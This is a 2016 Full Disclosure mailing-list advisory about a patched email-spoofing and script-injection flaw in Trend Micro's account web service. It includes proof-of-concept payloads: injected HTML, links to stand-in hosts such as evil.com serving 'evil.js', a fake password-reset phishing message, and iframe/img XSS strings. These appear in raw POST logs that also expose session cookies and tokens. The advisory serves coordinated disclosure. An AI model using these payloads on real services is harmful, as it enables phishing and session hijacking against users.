[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Trend Micro (Account) - Email Spoofing Web Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-04-26 12:49:25
Message-ID: 571F63D5.4030808 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Trend Micro (Account) - Email Spoofing Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1693
Trend Micro ID: 1-1-1035655030
Release Date:
=============
2016-04-25
Vulnerability Laboratory ID (VL-ID):
====================================
1693
Common Vulnerability Scoring System:
====================================
4.6
Product & Service Introduction:
===============================
Trend Micro Inc. is a global security software company founded in Los Angeles, California with \
global headquarters in Tokyo, Japan, and regional headquarters in Asia, Europe and the \
Americas. The company develops security software for servers, cloud computing environments, and \
small business. Its cloud and virtualization security products provide cloud security for \
customers of VMware, Amazon AWS, Microsoft Azure and vCloud Air. Eva Chen serves as Trend \
Micro's chief executive officer, a position she has held since 2005 when she succeeded founding \
CEO Steve Chang. Chang serves as chairman of Trend Micro.
(Copy of the Homepage: https://en.wikipedia.org/wiki/Trend_Micro )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an application-side vulnerability in \
the official Trend Micro Accounts online service web-application.
Vulnerability Disclosure Timeline:
==================================
2016-01-28: Researcher Notification & Coordination (Hadji Samir - Evolution Security GmbH)
2016-01-29: Vendor Notification (Trend Micro Security Team)
2016-02-02: Vendor Response/Feedback (Trend Micro Security Team)
2016-04-24: Vendor Fix/Patch (Trend Micro Developer Team)
2016-04-25: Security Acknowledgements (Trend Micro Security Team)
2016-04-25: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Trend Micro
Product: Account System - (Web-Application) 2016 Q1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistant email spoofing web vulnerability has been discovered in the official Trendmirco \
online-service web-application. The vulnerability allows an remote attacker to send spoofed \
emails with injected malicious script codes or changed content.
The persistent vulnerability is located in the `Share your protection` email function. It \
allows users to promote a product to friends or family. Remote attackers are able to inject own \
malicious script codes to the `download url` & `message` values of the `sendEmail` POST method \
request. The request method to inject is POST and the attack vector of the vulnerability is \
located on the application-side of the service. Remote attackers are able to manipulate the \
download url source and the message body context. The execution occurs in the email that \
arrives to the target inbox, when preparing to share.
The security risk of the application-side web vulnerability is estimated as medium with a cvss \
(common vulnerability scoring system) count of 4.6. Exploitation of the application-side web \
vulnerability requires a low privileged web-application user account and low or medium user \
interaction. Successful exploitation of the vulnerability results in persistent phishing \
mails, session hijacking, persistent external redirect to malicious sources and \
application-side manipulation of affected or connected software module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /my_account/product/
Vulnerable File(s):
[+] sendEmail
Vulnerable Parameter(s):
[+] downloadURL
[+] message
Affected Service(s):
[+] account.trendmicro.com
Proof of Concept (PoC):
=======================
The email spoofing and validation web vulnerability can be exploited by remote attackers with \
low privileged web-application user account and low user interaction. For security \
demonstration or to reproduce the vulnerability follow the provided information and steps below \
to continue.
PoC:1 (Message Body Context)
<table style="font-family: 'Helvetica Neue', 'Helvetica', Helvetica, Arial, sans-serif; \
font-size: 14px; width: 100%; margin: 0; padding: 0;"><tbody> <tr style="font-family: \
'Helvetica Neue', 'Helvetica', Helvetica, Arial, sans-serif; font-size: 14px; margin: 0; \
padding: 0;"><td style="font-family: 'Helvetica Neue', 'Helvetica', Helvetica, Arial, \
sans-serif; font-size: 14px; margin: 0; padding: 10px 10px 30px 40px;"><pre>"><"<[MALICIOUS \
INJECTED SCRIPT CODE VULNERABILITY!]></pre></td> </tr></table>
PoC:2 (Download Link)
<a href="http://www.vulnerability-lab.com/evil.js" target="_blank" style="color:#FFFFFF; \
text-decoration:none;">Jetzt herunterladen</a>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://account.trendmicro.com/my_account/product/sendEmail
Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Content Size[93] Mime \
Type[application/json] Request Headers:
Host[account.trendmicro.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 \
Firefox/43.0] Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[https://account.trendmicro.com/my_account/product]
Content-Length[375]
Cookie[
Connection[keep-alive]
Post Data:
fEmail[samir%40evolution-sec.com]
message[%3Ch1%3ETested+by+Samir%3C%2Fh1%3E%0D%0AHi%0D%0Afor+you+can+reset+your+password+%3Ca++href%3D%22http%3A%2F%2Fevil.com%22%3EClick+here%3C%2Fa%3E]
serialNumber[]
productName[Trend+Micro+Password+Manager]
downloadURL[http%3A%2F%2Fgr.trendmicro.com%2FGREntry%2FNonPayment%3FTARGET%3DMyAccount%26PID%3DID10%26FUNID%3DDownload%26LOCALE%3DEN-US]
Response Headers:
Date[Thu, 28 Jan 2016 15:46:51 GMT]
Server[Apache]
Vary[Accept-Encoding]
Content-Encoding[gzip]
X-Frame-Options[SAMEORIGIN]
Content-Length[93]
Connection[close]
Content-Type[application/json]
-
Status: 200[OK]
POST https://account.trendmicro.com/my_account/product/sendEmail
Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[93] Mime \
Type[application/json] Request Header:
Host[account.trendmicro.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[https://account.trendmicro.com/my_account/product/]
Content-Length[409]
Cookie[ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22639e9aaca389e3937ad0a \
97e65e21093%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%2284.128.253.174%22%3Bs%3A10%3A%22user_ag \
ent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%3B+rv%3A43.0%29+Gecko%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1454066434%3B%7D7c9aa0f33d17d7bdb9e7a1f5a7e17fca; \
SimpleSAMLSessionID=0feba51c20d2d59b8647d9d7909c2457; \
mbox=session#1454066430954-829131#1454068291; \
utag_main=v_id:01528d1cf445002011c3584df91008048017400d00bd0$_sn:1$_ss:1$_pn:1%3Bexp-session$_st \
:1454068239733$ses_id:1454066431045%3Bexp-session$dc_visit:1$dc_event:3%3Bexp-session$dc_region:eu-west-1%3Bexp-session; \
s_fid=69EBCB381B32F47E-3E523954A7C4D7A0; s_cc=true; \
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Daccount.trendmicro.com%25252Fmy_account%25252Fproduct%25252F%2526pidt%253D1%2526oid%253DSenden%2526oidt%253D3%2526ot%253DSUBMIT; \
SimpleSAMLAuthToken=_d0c8b30c12d50d03a598d0c967dcf0bba7dcd33fee] Connection[keep-alive]
POST-Daten:
fEmail[bkm%40evolution-sec.com]
message[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Cifr \
ame%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
serialNumber[]
productName[Trend+Micro+Password+Manager]
downloadURL[http%3A%2F%2Fgr.trendmicro.com%2FGREntry%2FNonPayment%3FTARGET%3DMyAccount%26PID%3DID10%26FUNID%3DDownload%26LOCALE%3DDE-DE]
Response Header:
Date[Fri, 29 Jan 2016 11:24:15 GMT]
Server[Apache]
Vary[Accept-Encoding]
Content-Encoding[gzip]
X-Frame-Options[SAMEORIGIN]
Content-Length[93]
Connection[close]
Content-Type[application/json]
-
Status: 200[OK]
POST https://account.trendmicro.com/my_account/product/sendEmail
Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[46] Mime \
Type[text/html] Request Header:
Host[account.trendmicro.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[https://account.trendmicro.com/my_account/product/]
Content-Length[207]
Cookie[ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22639e9aaca389e3937ad0a \
97e65e21093%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%2284.128.253.174%22%3Bs%3A10%3A%22user_ag \
ent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%3B+rv%3A43.0%29+Gecko%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1454066434%3B%7D7c9aa0f33d17d7bdb9e7a1f5a7e17fca; \
SimpleSAMLSessionID=0feba51c20d2d59b8647d9d7909c2457; \
mbox=session#1454066430954-829131#1454068291; \
utag_main=v_id:01528d1cf445002011c3584df91008048017400d00bd0$_sn:1$_ss:1$_pn:1%3Bexp-session$_st \
:1454068239733$ses_id:1454066431045%3Bexp-session$dc_visit:1$dc_event:3%3Bexp-session$dc_region:eu-west-1%3Bexp-session; \
s_fid=69EBCB381B32F47E-3E523954A7C4D7A0; s_cc=true; \
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Daccount.trendmicro.com%25252Fmy_account%25252Fproduct%25252F%2526pidt%253D1%2526oid%253DSenden%2526oidt%253D3%2526ot%253DSUBMIT; \
SimpleSAMLAuthToken=_d0c8b30c12d50d03a598d0c967dcf0bba7dcd33fee] Connection[keep-alive]
POST-Daten:
POST_DATA[fEmail=bkm%40evolution-sec.com&message=das+hier+ist+ein+trend+micro+sicherheitst \
est+by+hadji+samir&serialNumber=&productName=Trend+Micro+Password+Manager&downloadURL=http://www.vulnerability-lab.com/evil.php]
Response Header:
Date[Fri, 29 Jan 2016 11:28:02 GMT]
Server[Apache]
Vary[Accept-Encoding]
Content-Encoding[gzip]
X-Frame-Options[SAMEORIGIN]
Content-Length[46]
Connection[close]
Content-Type[text/html; charset=UTF-8]
Reference(s):
https://account.trendmicro.com
https://account.trendmicro.com/my_account/
https://account.trendmicro.com/my_account/product/
https://account.trendmicro.com/my_account/product/sendEmail
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable download url \
and message values in the sendEmail POST method request. Restrict the input and disallow \
special chars to prevent an application-side inject
Security Risk:
==============
The security risk of the email spoofing web vulnerability in the official trend micro accounts \
web-application is estimated as medium. (CVSS 4.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] – Hadji Samir [Evolution Security GmbH] \
[http://www.vulnerability-lab.com/show.php?user=Hadji%20Samir]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic